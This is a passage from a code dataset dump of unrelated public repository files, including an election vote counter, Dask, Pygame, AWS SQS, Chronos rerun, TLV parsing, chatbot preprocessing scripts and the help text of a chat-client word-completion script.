read_examples(file_name)","repo_name":"pritam004/GANMRC","sub_path":"source/get_ner_tags.py","file_name":"get_ner_tags.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22642003308","text":"# read the file\nimport os\nimport csv\n# filepath\ncsvpath = os.path.join('Resources', 'election_data.csv')\ncandidate = []\nwith open(csvpath) as csvpoll:\n pollreader = csv.reader(csvpoll, delimiter=\",\")\n print(pollreader)\n # skip the header\n csvheader = next(pollreader)\n # creating a list for candidates --raw\n for row in pollreader:\n candidate.append(row[2])\n\n # First method to calc the total of votes\n totalvotes1 = len(candidate)\n print(f\"First way to calc total number of votes {totalvotes1}\")\n list1 = [\"Total Number of Votes\", (totalvotes1)]\n # Extract names of candidates as unique values\n unique = []\n # for value coutns empty list\n countvals = []\n # for percent votes empty list\n percentvote = []\n countv = 0\n for vals in candidate:\n if vals not in unique:\n unique.append(vals)\n print(unique)\n # counting # of votes and percentages\n for uvals in unique:\n for vals in candidate:\n if uvals == vals:\n countv = countv+1\n countvals.append(countv)\n percent = countv/totalvotes1*100\n percentvote.append(percent)\n countv = 0\n print(countvals)\n print(percentvote)\n # counting who won\n nextv = countvals[3]\n for i in countvals:\n if i >= nextv:\n maxv = i\n nextv = i\n print(maxv)\nwinner_name=unique[countvals.index(maxv)]\nwinner=[\"Winner of the election\",winner_name,maxv]\nprint(winner)\nfinalresult=zip(unique,countvals,percentvote)\n# printing in the output file\noutput_file = os.path.join(\"..\", \"output\", \"election_result.csv\")\nwith open(output_file, \"w\") as result:\n writer = csv.writer(result)\n title=[\"Election Result\"]\n writer.writerow(title)\n writer.writerow(list1)\n writer.writerow([\"Candidate\",\"Number of Votes\",\"Percent\"])\n writer.writerows(finalresult)\n writer.writerow(winner)\n \n\n\n\n \n \n\n\n \n \n","repo_name":"Arpi65/UCI_Homework_Arpi","sub_path":"python_challenge/PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73045627734","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport dask.dataframe as dd\nfrom dask.diagnostics import ProgressBar\nfrom matplotlib import pyplot as plt\nimport asyncio\n#from dask.distributed import Scheduler, Worker, Client\n\n#client = Client()\n\n\ndf = dd.read_csv('../data/nyc-parking-tickets/*filtered_2.csv')\n\n# Type conversions\n#df[\"Date.First.Observed\"] = pd.to_datetime(df[\"Date.First.Observed\"])\n#df[\"Vehichle.Expiration.Date\"] = pd.to_datetime(df[\"Vehicle.Expiration.Date\"])\n#df[\"NTA\"] = pd.to_object(df[\"NTA\"])\n\nprint(F\"Imported data types: {df.dtypes}\")\n\nprint(F\"Num Rows: {len(df.index)}\")\n\nmissing_values = df.isnull().sum()\nprint(F\"Missing values: {missing_values}\")\n\nmissing_count = ((missing_values / df.index.size) * 100)\nprint(F\"Missing count: {missing_count}\")\n\nwith ProgressBar():\n # This is now a Pandas Series object\n missing_count_pct = missing_count.compute()\nprint(F\"missing count pct {missing_count_pct}\")\n\ncolumns_to_drop = missing_count_pct [missing_count_pct > 60].index\nprint(F\"Columns to drop: {columns_to_drop}\")\nwith ProgressBar():\n df_dropped = df.drop(labels=columns_to_drop, axis=1)\n # df = df.set_index('timestamp')\n # client.persist(df_dropped)\nprint(F\"df_dropped = {df_dropped}\")\n\n\n\n","repo_name":"falenn/dask-tutorial","sub_path":"helloworld/helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14030318079","text":"import pygame\r\nimport sys\r\nfrom color import Color\r\nfrom player import Player\r\nfrom player import PlayerRed, PlayerBlu, Ball, BorderTop, BorderBottom\r\nfrom screen import Screen\r\n\r\n\r\npygame.init()\r\n# Player and Rect data\r\nredplayer = PlayerRed()\r\nbluplayer = PlayerBlu()\r\nball = Ball()\r\ntopborder = BorderTop()\r\nbottomborder = BorderBottom()\r\n\r\n# Screen data\r\nscreen = Screen()\r\n\r\n# The game itself\r\ngame_over = False\r\nwhile not game_over:\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n\r\n redplayer.player_movement_input(event)\r\n bluplayer.player_movement_input(event)\r\n\r\n redplayer.update_movement()\r\n bluplayer.update_movement()\r\n ball.update_movement(redplayer, bluplayer, topborder, bottomborder, screen)\r\n\r\n screen.update_screen(redplayer, bluplayer, ball, topborder, bottomborder)\r\n pygame.display.update()\r\n","repo_name":"Chatchai222/StunningSalt","sub_path":"testing code.py","file_name":"testing code.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1713397196","text":"import os\nfrom reactivex import Observable, operators as ops\nfrom aws_lambda_powertools import Logger\nfrom aws_lambda_stream.connectors.sqs import Connector\nfrom aws_lambda_stream.utils.operators import split_buffer\nfrom .batch import to_batch_uow, unbatch_uow\n\n\ndef send_to_sqs(\n logger=Logger(),\n queue_url = os.getenv('QUEUE_URL'),\n message_field = 'message',\n batch_size=os.getenv('SQS_BATCH_SIZE') or os.getenv('BATCH_SIZE') or 10\n ):\n connector = Connector(queue_url)\n\n def to_input_params(batch_uow):\n return {\n **batch_uow,\n 'input_params': {\n 'Entries': list(map(\n lambda uow: uow[message_field],\n filter(\n lambda uow: message_field in uow,\n batch_uow['batch']\n )\n ))\n }\n }\n\n def send_message_batch(batch_uow):\n if len(batch_uow['input_params']['Entries']) == 0:\n return batch_uow\n logger.info(batch_uow['input_params'])\n return {\n **batch_uow,\n 'send_message_batch_response': connector.send_message_batch(\n batch_uow['input_params']\n )\n }\n\n def wrapper(source: Observable):\n return source.pipe(\n ops.buffer_with_count(batch_size, batch_size),\n ops.map(to_batch_uow),\n ops.map(to_input_params),\n ops.map(send_message_batch),\n ops.map(unbatch_uow),\n split_buffer()\n )\n return wrapper\n","repo_name":"clandro89/aws-lambda-stream","sub_path":"aws_lambda_stream/utils/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"10913920731","text":"import argparse\nimport copy\nimport datetime\n\nfrom paasta_tools import chronos_tools\nfrom paasta_tools.utils import load_system_paasta_config\nfrom paasta_tools.utils import NoConfigurationForServiceError\nfrom paasta_tools.utils import NoDeploymentsAvailable\nfrom paasta_tools.utils import NoDockerImageError\nfrom paasta_tools.utils import paasta_print\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='',\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true', dest=\"verbose\", default=False,\n help=\"Print out more output regarding the state of the service\",\n )\n parser.add_argument(\n '-d', '--soa-dir', dest=\"soa_dir\", metavar=\"SOA_DIR\",\n default=chronos_tools.DEFAULT_SOA_DIR,\n help=\"define a different soa config directory\",\n )\n parser.add_argument(\n '-a', '--run-all-related-jobs', action='store_true', dest='run_all_related_jobs',\n default=False, help='Run all the parent-dependent related jobs',\n )\n parser.add_argument(\n '-f', '--force-disabled', action='store_true', dest='force_disabled',\n default=False, help='Run services that are configured to be disabled',\n )\n parser.add_argument('service_instance', help='Instance to operate on. Eg: example_service.main')\n parser.add_argument(\n 'execution_date',\n help=\"The date the job should be rerun for. Expected in the format %%Y-%%m-%%dT%%H:%%M:%%S .\",\n )\n args = parser.parse_args()\n return args\n\n\ndef modify_command_for_date(chronos_job, date, verbose):\n \"\"\"\n Given a chronos job config, return a cloned job config where the command\n has been modified to reflect what it would have run as on\n a given date.\n\n :param chronos_job: a chronos job dictionary, as created by\n ``chronos_tools.create_complete_config``\n :param date: a ``datetime.datetime`` object.\n :returns chronos_job: a chronos_job dict with the command modified to\n interpolate in the context of the date provided.\n \"\"\"\n current_command = chronos_job['command']\n if current_command is not None:\n chronos_job['command'] = chronos_tools.parse_time_variables(\n command=current_command,\n parse_time=date,\n )\n else:\n if verbose:\n job_name = \".\".join(chronos_tools.decompose_job_id(chronos_job['name']))\n paasta_print(f'command in job {job_name} is empty - skipping formatting and depending on command in image')\n return chronos_job\n\n\ndef set_default_schedule(chronos_job):\n \"\"\"\n Given a chronos job, return a new job identical to the first, but with the\n schedule replaced with one that will set the job to run now.\n\n :param chronos_job: a chronos job dictionary suitable for POSTing to\n Chronos\n :returns: the chronos_job parameter, with the 'schedule' field modified to\n a schedule for chronos to run the job now and only once. The interval field\n of the schedule is irrelevant, but required by Chronos.\n \"\"\"\n chronos_job['schedule'] = 'R1//PT1M'\n return chronos_job\n\n\ndef get_tmp_naming_scheme_prefix(timestamp=None):\n timestamp = timestamp if timestamp else datetime.datetime.utcnow().isoformat()\n timestamp = timestamp.replace(':', '')\n timestamp = timestamp.replace('.', '')\n\n return '{}-{}'.format(\n chronos_tools.TMP_JOB_IDENTIFIER,\n timestamp,\n )\n\n\ndef set_tmp_naming_scheme(chronos_job, timestamp=None):\n \"\"\"\n Given a chronos job, return a new job identical to the first, but with the\n name set to one which makes it identifiable as a temporary job.\n\n :param chronos_job: a chronos job suitable for POSTing to Chronos\n :param timestamp: timestamp to use for the generation of the tmp job name\n :returns: the chronos_job parameter, with the name of the job modified to\n allow it to be identified as a temporary job.\n \"\"\"\n current_name = chronos_job['name']\n\n chronos_job['name'] = '{}{}{}'.format(\n get_tmp_naming_scheme_prefix(timestamp),\n chronos_tools.SPACER,\n current_name,\n )\n\n return chronos_job\n\n\ndef remove_parents(chronos_job):\n \"\"\"\n Given a chronos job, return a new job identical to the first, but with the\n parents field removed\n\n :param chronos_job: a chronos_job suitable for POSTing to Chronos\n :returns: the chronos_job parameter, with the parents field of the job\n removed.\n \"\"\"\n chronos_job.pop('parents', None)\n return chronos_job\n\n\ndef clone_job(chronos_job, timestamp=None, force_disabled=False):\n \"\"\"\n Given a chronos job, create a 'rerun' clone that respects the parents relations.\n If the job has his own schedule it will be executed once and only once, and as soon as possible.\n\n :param chronos_job: a chronos job suitable for POSTing to Chronos\n :param timestamp: timestamp to use for the generation of the tmp job name\n :returns: the chronos_job parameter, modified to be submitted as a\n temporary clone used to rerun a job in the context of a given date.\n \"\"\"\n clone = copy.deepcopy(chronos_job)\n job_type = chronos_tools.get_job_type(clone)\n\n # modify the name of the job\n clone = set_tmp_naming_scheme(clone, timestamp)\n\n # If the jobs is a dependent job rename the parents dependencies\n # in order to make this job dependent from the temporary clone of the parents\n if job_type == chronos_tools.JobType.Dependent:\n clone['parents'] = [\n '{}{}{}'.format(\n get_tmp_naming_scheme_prefix(timestamp),\n chronos_tools.SPACER,\n parent,\n )\n for parent in chronos_job['parents']\n ]\n else:\n # If the job is a scheduled one update the schedule to start it NOW\n clone = set_default_schedule(clone)\n\n # Set disabled to false if force_disabled is on\n if force_disabled:\n clone['disabled'] = False\n\n return clone\n\n\ndef main():\n args = parse_args()\n\n system_paasta_config = load_system_paasta_config()\n cluster = system_paasta_config.get_cluster()\n\n service, instance = chronos_tools.decompose_job_id(args.service_instance)\n\n config = chronos_tools.load_chronos_config()\n client = chronos_tools.get_chronos_client(config)\n\n related_jobs = chronos_tools.get_related_jobs_configs(cluster, service, instance, soa_dir=args.soa_dir)\n if not related_jobs:\n error_msg = \"No deployment found for {} in cluster {}. Has Jenkins run for it?\".format(\n args.service_instance, cluster,\n )\n paasta_print(error_msg)\n raise NoDeploymentsAvailable\n\n if not args.run_all_related_jobs:\n # Strip all the configuration for the related services\n # those information will not be used by the rest of the flow\n related_jobs = {\n (service, instance): related_jobs[(service, instance)],\n }\n\n complete_job_configs = {}\n for (srv, inst) in related_jobs:\n try:\n complete_job_configs.update(\n {\n (srv, inst): chronos_tools.create_complete_config(\n service=srv,\n job_name=inst,\n soa_dir=args.soa_dir,\n ),\n },\n )\n except (NoDeploymentsAvailable, NoDockerImageError) as e:\n error_msg = \"No deployment found for {} in cluster {}. Has Jenkins run for it?\".format(\n chronos_tools.compose_job_id(srv, inst), cluster,\n )\n paasta_print(error_msg)\n raise e\n except NoConfigurationForServiceError as e:\n error_msg = (\n \"Could not read chronos configuration file for {} in cluster {}\\nError was: {}\".format(\n chronos_tools.compose_job_id(srv, inst), cluster, str(e),\n )\n )\n paasta_print(error_msg)\n raise e\n except chronos_tools.InvalidParentError as e:\n raise e\n\n if not args.run_all_related_jobs:\n sorted_jobs = [(service, instance)]\n else:\n sorted_jobs = chronos_tools.topological_sort_related_jobs(cluster, service, instance, soa_dir=args.soa_dir)\n\n timestamp = datetime.datetime.utcnow().isoformat()\n\n chronos_to_add = []\n for (service, instance) in sorted_jobs:\n # complete_job_config is a formatted version of the job,\n # so the command is formatted in the context of 'now'\n # replace it with the 'original' cmd so it can be re rendered\n chronos_job_config = chronos_tools.load_chronos_job_config(\n service=service,\n instance=instance,\n cluster=cluster,\n soa_dir=args.soa_dir,\n )\n original_command = chronos_job_config.get_cmd()\n complete_job_config = complete_job_configs[(service, instance)]\n complete_job_config['command'] = original_command\n clone = clone_job(\n chronos_job=complete_job_config,\n timestamp=timestamp,\n force_disabled=args.force_disabled,\n )\n # modify the command to run commands for a given date\n clone = modify_command_for_date(\n chronos_job=clone,\n date=datetime.datetime.strptime(args.execution_date, \"%Y-%m-%dT%H:%M:%S\"),\n verbose=args.verbose,\n )\n\n if not args.run_all_related_jobs and chronos_tools.get_job_type(clone) == chronos_tools.JobType.Dependent:\n # If the job is a dependent job and we want to re-run only the specific instance\n # remove the parents and update the schedule to start the job as soon as possible\n clone = set_default_schedule(remove_parents(clone))\n\n chronos_to_add.append(clone)\n\n for job_to_add in chronos_to_add:\n client.add(job_to_add)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"eric-erki/An-open-distributed-platform-as-a-service","sub_path":"paasta_tools/chronos_rerun.py","file_name":"chronos_rerun.py","file_ext":"py","file_size_in_byte":9890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14256452935","text":"\"\"\"\nCelery configuration\n\"\"\"\nimport os\n\nfrom celery import Celery\n\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"odl_video.settings\")\n\nfrom django.conf import ( # pylint: disable=wrong-import-order,wrong-import-position\n settings,\n)\n\napp = Celery(\"odl_video\")\n\n# Using a string here means the worker don't have to serialize\n# the configuration object to child processes.\n# - namespace='CELERY' means all celery-related configuration keys\n# should have a `CELERY_` prefix.\napp.config_from_object(\"django.conf:settings\", namespace=\"CELERY\")\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS) # pragma: no cover\n\n\n@app.task(bind=True)\ndef debug_task(self):\n \"\"\"\n Task for debugging purposes\n \"\"\"\n print(\"Request: {0!r}\".format(self.request))\n","repo_name":"mitodl/odl-video-service","sub_path":"odl_video/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"72998550614","text":"# %%\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nimport math\nfrom text import *\nimport os\nfrom tharnal import *\nimport random\nimport scipy\n\nmc = \"black\"\nplt.rcParams.update(\n {\n \"font.size\": 40,\n \"axes.labelcolor\": \"{}\".format(mc),\n \"xtick.color\": \"{}\".format(mc),\n \"ytick.color\": \"{}\".format(mc),\n \"font.family\": \"sans-serif\",\n }\n)\n# %% Set up paths and variables for plot and analysis\npath_data = \"../../data/participants_mol/\"\npath_figures = \"../../figures/\"\n# list folders in path\nfolders = os.listdir(path_data)\n# remove hidden files\nparticipant_folders = [f for f in folders if not f.startswith(\".\")]\n\nlwD = 7\nwidthtick = 5\nlenD = 20\ns_bub = 350\nultraviolet = \"#654EA3\"\nmystililac = \"#BCB4C4\"\ndriedmoss = \"#CDBC7E\"\n\npattern = f\"mol_.*\\.hdf5$\"\n\npatternc = re.compile(pattern)\n\nall_deltas = []\nall_baselines = []\nslopes = []\ncoeffs = []\np_values = []\nall_thresholds = []\nlist_lists_deltas = []\ndiscarded_trials = {}\n\n# %%\nfor folder_name in participant_folders:\n names = []\n print(folder_name)\n for filename in os.listdir(f\"{path_data}/{folder_name}/\"):\n\n if patternc.match(filename):\n name, form = filename.split(\".\")\n names.append(name)\n else:\n # print(filename)\n continue\n\n names.sort(key=natural_keys)\n\n delta_list = []\n baseline_list = []\n threshold_list = []\n n_discarded_trials = 0\n\n for i, name in enumerate(names):\n print(name)\n dat_im = ReAnRaw(f\"{path_data}/{folder_name}/{name}\")\n dat_im.datatoDic()\n dat_im.extractMeans()\n\n dat_im.extractOpenClose(\"stimulus\")\n if len(dat_im.open) > 0:\n baseline = np.mean(dat_im.means[: (dat_im.open[0] + 1)])\n # print(baseline)\n\n dat_im.extractMeans(name_coor=\"diff_coor\")\n diff_means = dat_im.means\n threshold = dat_im.means[-1]\n\n delta_indv = baseline - threshold\n\n if delta_indv > 0.2:\n delta_list.append(delta_indv)\n baseline_list.append(baseline)\n threshold_list.append(threshold)\n\n else:\n n_discarded_trials += 1\n print(\"DELTA BELOW\")\n else:\n n_discarded_trials += 1\n print(\"Shutter didn't open\")\n\n list_lists_deltas.append(delta_list)\n threshold_subj = np.mean(threshold_list)\n delta_subj = np.mean(delta_list)\n baseline_subj = np.mean(baseline_list)\n discarded_trials[folder_name] = n_discarded_trials\n\n all_deltas.append(delta_subj)\n all_baselines.append(baseline_subj)\n all_thresholds.append(threshold_subj)\n\n# %%\n# ALL DELTAS\ndelta_popu = np.mean(all_deltas)\nfig, ax = plt.subplots(1, 1, figsize=(7, 10))\n\nlwD = 7\nwidthtick = 5\nlenD = 20\ns_bub = 350\n\nfor dd in all_deltas:\n x_pos = random.uniform(0.95, 1.05)\n # print(x_pos)\n ax.scatter(x_pos, -dd, s=s_bub, color=ultraviolet)\n\nax.plot([0.95, 1.05], [-delta_popu, -delta_popu], linewidth=lwD, color=driedmoss)\n\nax.set_xlim(0.85, 1.15)\nax.set_ylim(-2, 0)\n\nax.set_ylabel(\"Relative cold threshold\\n\\n(ΔT $^\\circ$C)\", linespacing=0.6)\n# ax.set_xlabel('Trial number')\n\n# ax.axhline(delta_subj, 0, 1, linewidth=lwD, color=ultraviolet)\nplt.tick_params(bottom=False, labelbottom=False)\n\n# ax.axhline(0, 0, 8, linewidth=20, color='k', linestyle=':')\n\nax.yaxis.set_tick_params(width=lwD, length=lenD, color='grey')\nax.xaxis.set_tick_params(width=lwD, length=lenD, color='grey')\n\nfor spine in ax.spines.values():\n spine.set_edgecolor('grey')\n\nax.spines[\"left\"].set_linewidth(lwD)\nax.spines[\"bottom\"].set_linewidth(lwD)\n\nax.tick_params(axis=\"y\", which=\"major\", pad=10)\nax.tick_params(axis=\"x\", which=\"major\", pad=10)\n\nax.set_yticks([-2, -1.5, -1, -0.5, 0])\n\nax.spines[\"top\"].set_visible(False)\nax.spines[\"right\"].set_visible(False)\n\nplt.tight_layout()\nplt.savefig(f\"{path_figures}/figure1/panelF_deltas.png\", transparent=True)","repo_name":"iezqrom/publication-cold-sensation-without-touch","sub_path":"code/analysis-plotting/figure1F_deltas.py","file_name":"figure1F_deltas.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13131933470","text":"#!/usr/bin/python3\nimport io\nimport sys\n\nfrom typing import Any, Iterable\nfrom bertlv import config\nfrom bertlv.parser import (\n BinaryParser,\n InsufficientDataError,\n ParserError,\n TreeBuilder,\n XmlParser,\n parse,\n parse_bytes,\n)\nfrom bertlv.tag import Tag\nfrom bertlv.tree import TlvNode\n\ndef _TlvNode2Dict(tlvNode, dictData):\n children = tlvNode.children\n containerData = {}\n if len(children) == 0 :\n dictData[\"type\"] = \"leaf\"\n dictData[\"tag\"]= tlvNode.name\n dictData[\"value\"]= tlvNode.value.hex()\n else:\n for i in children:\n containerData = {}\n _TlvNode2Dict(i, containerData)\n \n if len(children) != 0 :\n dictData[tlvNode.name] = containerData\n dictData[\"type\"] = \"parent\"\n\ndef TlvNode2Dict(tlvTree):\n dictData = {}\n if tlvTree.is_root == True and len(tlvTree.children) >0 :\n _TlvNode2Dict(tlvTree, dictData)\n return dictData;\n\ndef printTlv2Json():\n byteString = sys.argv[1]\n if len(byteString) <=0:\n exit (2)\n bytes.fromhex(byteString)\n fp = io.BytesIO(bytes.fromhex(byteString))\n treedata = parse(fp, BinaryParser())\n dictData = TlvNode2Dict(treedata)\n print(dictData)\n \ndef printtree():\n byteString = sys.argv[2]\n if len(byteString) <=0:\n exit (2)\n bytes.fromhex(byteString)\n fp = io.BytesIO(bytes.fromhex(byteString))\n treedata = parse(fp, BinaryParser())\n print(treedata.dump())\n\nif len(sys.argv) > 3:\n exit(1)\nif len(sys.argv) == 3:\n printtree()\nelif len(sys.argv) == 2:\n printTlv2Json()\nelse:\n exit(3)","repo_name":"vivekkushwaha39/NppPacketParser","sub_path":"src/python/tlv2json.py","file_name":"tlv2json.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2769883856","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('data_load', '0004_rmsinciden'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='RMSInciden',\n new_name='RMSIncident',\n ),\n ]\n","repo_name":"codeforamerica/vallejo-css-toolkit","sub_path":"data_load/migrations/0005_auto_20151119_1344.py","file_name":"0005_auto_20151119_1344.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"11017886611","text":"from labm8.py import test\nfrom tools.format.formatters import go\n\nFLAGS = test.FLAGS\n\n\ndef test_small_go_program():\n \"\"\"Test pre-processing a small C++ program.\"\"\"\n text = go.FormatGo.Format(\n \"\"\"\npackage main\nimport \"fmt\"\nfunc main() {\n fmt.Println(\"hello world\")\n}\"\"\"\n )\n assert (\n text\n == \"\"\"\\\npackage main\n\nimport \"fmt\"\n\nfunc main() {\n\\tfmt.Println(\"hello world\")\n}\n\"\"\"\n )\n\n\ndef test_empty_file():\n with test.Raises(go.FormatGo.FormatError):\n go.FormatGo.Format(\"\")\n\n\nif __name__ == \"__main__\":\n test.Main()\n","repo_name":"ChrisCummins/phd","sub_path":"tools/format/formatters/tests/go_test.py","file_name":"go_test.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"3473426460","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.optimize as scop\n\ndef mapFeature(x1, x2):\n degree = 2\n m = len(x1)\n\n x = np.ones([m, 1]) \n for i in range(1, degree + 1):\n for j in range(i + 1):\n x = np.c_[x, (x1 ** (i - j)) * (x2 ** j)]\n\n return x\n\ndef sigmoid(x):\n g = 1. / (1 + np.e ** (-1 * x))\n return g\n\ndef costFunction(theta, x, y, Lambda):\n h = sigmoid(x.dot(theta))\n m = len(y)\n theta_temp = theta.copy()\n theta_temp[0] = 0\n J = 1. / m * -1 * (np.transpose(y).dot(h) + np.transpose(1 - y).dot(1 - h)) + Lambda / (2 * m) * np.transpose(theta_temp).dot(theta_temp)\n return J\n\ndef gradient(theta, x, y, Lambda):\n h = sigmoid(x.dot(theta))\n m = len(y)\n theta_temp = theta.copy()\n theta_temp[0] = 0\n\n g = 1. / m * np.transpose(x).dot(h - y) + Lambda / m * theta_temp\n return g\n\nif __name__ == \"__main__\":\n data = np.loadtxt(fname = \"ex2data2.txt\", delimiter = \",\")\n x = data[:, 0:2]\n y = data[:, 2]\n\n pos = np.where(y == 1)\n neg = np.where(y == 0)\n plot1 = plt.scatter(x[pos, 0], x[pos, 1], marker = \"o\", c = \"b\")\n plot2 = plt.scatter(x[neg, 0], x[neg, 1], marker = \"x\", c = \"r\")\n\n plt.legend([plot1, plot2], [\"Admitted\", \"No Admitted\"], loc = \"upper right\")\n\n x = mapFeature(x[:, 0], x[:, 1])\n\n m,n = x.shape\n initial_theta = np.zeros([n , 1])\n\n initial_lambda = 0.1\n print(x.shape, y.shape, initial_theta.shape)\n result = scop.fmin_bfgs(f = costFunction, x0 = initial_theta, fprime = gradient, args = (x, y, initial_lambda))\n print(result)\n\n x = np.linspace(-1, 1.5, 50)\n y = np.linspace(-1, 1.5, 50)\n z = np.zeros([len(x), len(y)])\n\n for i in range(len(x)):\n for j in range(len(y)):\n z[i][j] = mapFeature(np.reshape(x[i], [-1, 1]), np.reshape(y[j], [-1, 1])).dot(result)\n\n z = z.T\n\n plt.contour(x, y, z, [0, 0.1])\n plt.show()\n ","repo_name":"Fitz1003Miao/NGhomework","sub_path":"ex2/ex2_reg.py","file_name":"ex2_reg.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1658569542","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys, os\nimport re\nfrom collections import Counter\nimport logs\nimport codecs\nfrom unidecode import unidecode\n\n\n\ndef stripNonConversation(rawInputPath, rawOutputPath, badWords):\n rawData = open(rawInputPath, 'r')\n processedData = open(rawOutputPath,'w+')\n \n rawData.seek(0)\n\n regex1 = re.compile(\"\\[(.*?)\\]\")\n regex2 = re.compile(\"\\((.*?)\\)\")\n for line in rawData:\n line = re.sub(regex1, '', line) # remove []\n line2 = re.sub(regex2, '', line) # remove ()\n line3 = re.sub(r'[^\\x00-\\x7f]',r'', line2) # keep ascii chars only\n line3 = removeBadWords(line3, badWords) # remove non-conversation lines \n line3 = re.sub('^\\s*\\n$', '', line3)\n if(line3): \n processedData.write(line3)\n \n processedData.close()\n rawData.close() \n\n\ndef spanish_prep(rawInputPath, tmp_asciiPath, badWords):\n\n rawData = codecs.open(rawInputPath, 'r', encoding='utf-8')\n asciiData = open(tmp_asciiPath, 'w+', encoding='ascii')\n\n rawData.seek(0)\n \n for line in rawData:\n line = unidecode(line)\n asciiData.write(line)\n \n rawData.close()\n asciiData.close()\n\n\n# private\ndef removeBadWords(line, badWords):\n for i in range(len(badWords)):\n line = re.sub(badWords[i], '', line)\n return line\n\n\n\n# input must be striped for NonConversation\ndef findMostFreqSpeaker(rawProcessedPath):\n\n rawData = open(rawProcessedPath, 'r')\n\n rawData.seek(0)\n names = []\n for line in rawData:\n end = line.find(':')\n if (end != -1):\n x = line[0:end]\n names.append(x)\n\n mostFreqActor = Counter(names).most_common(1)\n mostFreqActor= [name[0] for name in mostFreqActor]\n mostFreqActor = ''.join(mostFreqActor)\n\n rawData.close()\n \n return mostFreqActor\n\n\n\ndef separateData(rawProcessedPath, mostFreqActor, enc_dataPath, dec_dataPath, showID):\n \n rawData = open(rawProcessedPath,'r')\n enc_data = open(enc_dataPath, 'a+')\n dec_data = open(dec_dataPath,'a+')\n \n name = mostFreqActor + ':' # mostFreqActor is name of speaker for decoder\n rawData.seek(0) \n prev = rawData.readline()\n\n sample_num = 0;\n for line in rawData:\n start = line.find(name)\n\n if (start != -1):\n #make sure there is a matching response\n prev_idx = prev.find(\":\")\n if(prev_idx == -1):\n prev = line\n continue\n #if there is a matching response, write to files\n start = start + (len(name))\n target = line[start:] # actual text for decoder\n removeActorNames(target)\n dec_data.write(target)\n\n\n name_speaker = prev[0:prev_idx] # name of speaker for encoder\n speaker = prev[prev_idx+1:] # actual text for encoder\n removeActorNames(speaker)\n enc_data.write(speaker)\n \n # create seperate file to log actor id's\n msg = 'ENC_ACTORID = ' + mostFreqActor + ' DEC_ACTORID = ' + name_speaker + '\\n'\n logs.log(sample_num, msg, showID, 'preprocess')\n sample_num = sample_num + 1\n \n prev = line\n\n\n dec_data.close() \n enc_data.close()\n rawData.close()\n\n\n#private\n# last NonConversation text to be removed\ndef removeActorNames(line):\n end = line.find(':')\n if (end != -1):\n x = line[0:end+1]\n \n regex = \"^(\\s)*\" + re.escape(x) + \"(\\s)*(\\.)?(\\s)*(\\:)?\"\n regex = re.compile(regex)\n re.sub(regex,'',line)\n return line \n","repo_name":"mkperkin/FRIENDS-CHATBOTS","sub_path":"preprocess_helpers.py","file_name":"preprocess_helpers.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4203328370","text":"help_args = \"[reverse]\"\n\nhelp_args_desc=\"\"\"reverse: Reverse the direction of the completion cycle\n\nDescription:\n\nThis script tries to complete the current word by looking at the last lines of\nthe current buffer. It is inspired by Vim's keyword completion. It does not\nbind any keys by default, but it's not useful unless bindings exist. To make it\nsimilar to Vim I suggest bind ctrl-P to \"/complete_word\" and ctrl-N to\n\"/complete_word reverse\"\n\nIf someone (including you) has written 'internationalization' in the current\nbuffer recently you can type 'inter' and the full word will be inserted\nfor you. If someone had written 'internet' in the mean time that will be\ninserted instead since it appeared more recently: repeat the ctrl-P keystroke\nto cycle matches. If you go too far you can press ctrl-N to reverse the\ndirection of the cycle. If there are no matches nothing happens.\n\nAs the matches are inserted directly into the input bar there is no need to\npress a key to \"accept\" the current completion. Just continue typing; the\nscript will then regard its job as done.\n\nThe default number of lines to search in is 50. If the script appears to be\nslow you can reduce the number of lines to search for matches by changing the\n\"lines_limit\". Conversely, if it rarely completes the word you want you can\nincrease the number.\n\nIt only considers lines that are messages written by humans (or bots). 